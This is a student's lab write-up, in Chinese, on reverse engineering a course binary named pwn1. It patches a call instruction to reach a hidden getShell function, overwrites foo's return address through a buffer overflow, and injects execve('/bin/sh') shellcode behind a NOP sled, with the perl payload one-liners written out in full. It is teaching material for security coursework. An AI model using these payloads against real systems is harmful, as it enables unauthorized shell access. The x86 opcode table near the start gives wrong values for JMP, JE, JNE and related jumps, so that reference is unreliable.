20165306 Exp1 PC平台逆向破解
一、逆向及Bof基础实践说明
1. 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
三个实践内容如下:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 以及注入运行任意代码。
2.基础知识
- 熟悉Linux基本操作
|:管道,将前者的输出作为后者的输入。
>:输入输出重定向符,将前者输出的内容输入到后者中。
objdump -d:从objfile中反汇编那些特定指令机器码的section。
xxd:为给定的标准输入或者文件做一次十六进制的输出,它也可以将十六进制输出转换为原来的二进制格式。
perl -e:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。
ps -ef:显示所有进程,并显示每个进程的UID,PPIP,C与STIME栏位。
参考资料:
- NOP, JNE, JE, JMP, CMP汇编指令的机器码
NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(90)
JMP:无条件转移指令(70)
JLE:小于等于(71)
JL:小于(72)
JE:相等(73)
JNE:不相等(74)
JGE:大于等于(75)
JG:大于(76)
CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
二、直接修改程序机器指令,改变程序执行流程
知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
学习目标:理解可执行文件与机器指令
进阶:掌握ELF文件格式,掌握动态技术
objdump -d pwn1反汇编
call 8048491 <foo>是汇编指令,将调用位于地址8048491处的foo函数;其对应机器指令为e8 d7 ff ff ff,e8即跳转之意。
我们想让main函数调用getShell,只要修改d7ffffff为 47d-4ba得到的补码c3ffffff。
# cp pwn1 pwn2
# vi pwn2
注:以下1~7操作是在vi内
1.按ESC键
2.输入:%!xxd,将显示模式切换为16进制模式
3.查找要修改的内容 /d7
4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
5.按i键进入插入模式,修改d7为c3
6.按Esc退出插入模式,输入:%!xxd -r转换16进制为原格式
7.输入:wq存盘退出vi
8.再反汇编看一下,call指令是否正确调用getshell
9.运行修改后的代码,可以得到shell提示符
三、通过构造输入参数,造成BOF攻击,改变程序执行流
- 知识要求:堆栈结构,返回地址
- 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
- 进阶:掌握ELF文件格式,掌握动态技术
1.反汇编,了解程序的基本功能
该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞,我们的目标是覆盖返回地址。
2.确认输入字符串哪几个字符会覆盖到返回地址
# gdb pwn1
eip的值为SCII的5,即在输入字符串的“5”的部分发生溢出。将“5”的部分改为其他数字进一步确认
1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为getShell的内存地址,输给pwn1,pwn1就会运行getShell。
3.确认用什么值来覆盖返回地址
getShell的内存地址,通过反汇编时可以看到,即0804847d。
接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。
对比之前eip 0x34333231 0x34333231,正确应该输入11111111222222223333333344444444\x7d\x84\x04\x08。
4.构造输入字符串
由为没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
使用16进制查看指令xxd查看input文件的内容是否如预期。
然后将input的输入,通过管道符“|”,作为pwn1的输入。
四、注入Shellcode并执行
1.准备一段Shellcode
shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
2.准备工作
3.构造要注入的payload
Linux下有两种基本构造攻击buf的方法:
retaddr+nop+shellcode和nop+shellcode+retaddr。缓冲区小就把shellcode放后边(RNS),缓冲区大就把shellcode放前边(NSR)。
nop一为是了填充,二是作为“着陆区/滑行区”。
我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。得把它改为这段shellcode的地址。特别提醒:最后一个字符千万不能是\x0a。
接下来我们来确定\x4\x3\x2\x1到底该填什么。
- 打开一个终端注入这段攻击buf:
再开另外一个终端,用gdb来调试pwn1这个进程
找到pwn1的进程号是2411
启动gdb调试这个进程
- 通过设置断点,来查看注入buf的内存地址
- 在pwn1进程正在运行的终端按回车,这就是前面为什么不能以
\x0a来结束 input_shellcode的原因。
- 再返回调试终端,使用info r esp查找地址。
使用
x/16x 0xffffd2fc查看其存放内容,看到了01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是0xffffd300。接下来只需要将之前的\x4\x3\x2\x1改为
\x00\xd3\xff\xff即可
perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode1
再执行程序
五、遇到的问题
